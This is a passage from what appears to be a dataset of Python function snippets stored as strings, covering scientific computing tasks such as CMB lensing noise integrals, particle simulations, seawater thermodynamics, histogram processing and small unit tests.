TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. 
#self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n 
hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will 
help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + 
np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = 
float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. 
You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n 
self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def eulerphi(n):\n\treturn euler_phi(n)", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= 